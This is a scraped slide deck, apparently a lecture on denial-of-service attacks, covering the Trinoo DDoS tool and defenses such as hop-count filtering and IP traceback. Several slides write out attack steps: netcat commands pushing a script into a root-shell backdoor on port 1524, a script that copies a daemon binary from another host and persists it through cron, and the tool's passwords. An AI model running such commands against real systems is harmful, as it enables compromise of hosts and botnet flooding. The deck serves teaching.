Network Security CIA +Availability By Jinjian Ma Topics DOS/DDoS - - PowerPoint PPT Presentation

network security
SMART_READER_LITE
LIVE PREVIEW

Network Security CIA +Availability By Jinjian Ma Topics DOS/DDoS - - PowerPoint PPT Presentation

Jan 17, 2024 342 likes •615 views

Network Security CIA +Availability By Jinjian Ma Topics DOS/DDoS Detection & Defense Prevention DOS/DDoS Types Vulnerability attack Flooding attack DoS vs DDoS DoS: Attack is launched from single host Less

slide-1
SLIDE 1

Network Security

By Jinjian Ma

CIA +Availability

slide-2
SLIDE 2

Topics

  • DOS/DDoS
  • Detection & Defense
  • Prevention
slide-3
SLIDE 3

DOS/DDoS Types

  • Vulnerability attack
  • Flooding attack
slide-4
SLIDE 4

DoS vs DDoS

DoS:

  • Attack is launched from single host
  • Less powerful

DDoS:

  • Two components: agent & handler
  • Hard to defend
slide-5
SLIDE 5

DDoS step by step

  • 1. Attacker have some knowledge of program/system flaw
  • 2. Scan network, build a list of compromised hosts
  • 3. Select desired architecture
  • 4. Distribute agents, optionally, hide agents process
  • 5. Launch attack
slide-6
SLIDE 6

Real life example Trinoo (1999)

  • a easy to use DDoS tool
  • Free download
  • master and daemons network
slide-7
SLIDE 7

Trinoo Deployment

attacker I will exploit TCP port 1524 to do something evil Ingreslock backdoor uses port 1524, telnet to it will give you a root shell nmap scan port 1524

slide-8
SLIDE 8

Trinoo Deployment

A.A.A.A B.B.B.B Compromised hosts found by scan ./trin.sh | nc A.A.A.A 1524 & ./trin.sh | nc B.B.B.B 1524 & ./trin.sh | nc C.C.C.C 1524 & ./trin.sh | nc D.D.D.D 1524 & C.C.C.C D.D.D.D Note: you can imagine nc does almost the same thing as telnet

slide-9
SLIDE 9

trin.sh

echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen" echo "echo rcp is done moving binary" echo "chmod +x /usr/sbin/rpc.listen" echo "echo launching trinoo" echo "/usr/sbin/rpc.listen" echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron" echo "crontab cron" echo "echo launched" echo "exit"

slide-10
SLIDE 10

Trinoo Network

master master master … daemon daemon … daemon daemon … daemon daemon victim attacker uses telnet to interact with master master send messages to daemons daemons listen to port connected to master Message flood

slide-11
SLIDE 11

Attack using Trinoo

1.Prepare daemons on compromised hosts 2.Launch masters, enter password (gOrave) 3.Telnet to masters, enter password (betaalmostdone) 4.Now you can control a DDoS attack

  • Control packet size
  • Decide attack duration
  • Stop/Start attack
slide-12
SLIDE 12

Attack using Trinoo

Show active daemons Launch an attack

slide-13
SLIDE 13

Attack using Trinoo

slide-14
SLIDE 14

Daemon Source code

slide-15
SLIDE 15

Based on DDoS…

ICMP smurf flooding

  • forge ICMP source to victim

TCP SYN flooding UDP flooding …

slide-16
SLIDE 16

Hop-count IP traceback Intrusion Detection Systems (IDS)

Detection & Defense

slide-17
SLIDE 17

When Hop-count useful

Attackers want:

  • 1. conceal flooding sources and localities of

flooding traffic

  • 2. coax uncompromised hosts into becoming

reflectors Idea:

  • 1. Modern OSs use few selected initial TTL

typically: 30, 32, 60, 64, 128, 255

  • 2. Maintain a IP-HOP map table
slide-18
SLIDE 18

Hop-count

Pros:

  • Easy to implement, using existing TTL field
  • Effective to IP spoofing

Cons:

  • Forged pkts have the same hop-count as

zombies

  • Attacks which do not spoof IP
slide-19
SLIDE 19

IP traceback

Traceback true attacking source

  • Router packet marking
  • Path reconstruction algorithm

Fast Internet Traceback (FIT)

slide-20
SLIDE 20

Fast Internet Traceback

6th bit in TTL

C

C: global constant

slide-21
SLIDE 21

Fast Internet Traceback

RIT implemented router ID: 0101100000000000 TTL: 255 -> 1111 1111 ID: 0101100000000000 TTL: 254 -> 1111 1110 ID: 0101100000000000 TTL: 253 -> 1111 1101 ID: 111(4th part of IP hash) TTL: 246 -> 1111 0110 ID: 111(4th part of IP hash) TTL: 245 -> 1111 0101 ID: 111(4th part of IP hash) TTL: 244 -> 1111 0100 ID: 111(4th part of IP hash) TTL: 243 -> 1111 0011 This packet came from a RIT router 3 hops away from me! 6th bit in TTL

slide-22
SLIDE 22

Fast Internet Traceback

6th bit in TTL FIT router Original TTL: 253 -> (1111 1101) C = 22 -----------> (1 0110) New TTL: 246 ---> (1111 0110) b: 1 Marking probability: 0.04 C = 22

  • bserved TTL: 245
  • bserved TTL: 244
  • bserved TTL: 243
slide-23
SLIDE 23

Fast Internet Traceback

  • bserved TTL: 243 --> (1111 0011)

C = 22 ---> (1 0110) b: 1 d = (b|c - TTL[5::0]) mod 64 d = (1|1 0110 - 110011) mod 64 = 3 mod 64 = 3 hops aways from FIT ruoter Server maintains a map of IP hashes Precomputed before attack

slide-24
SLIDE 24

Fast Internet Traceback

Pros:

  • Not every router has to be RIT router
  • Not violate original design of IP header

Cons:

  • Not effective to spoofed IP
slide-25
SLIDE 25

Prevention

Redundant service Defense using puzzle Pushback

Challenge: No security policies can be globally enforced

slide-26
SLIDE 26

Question ?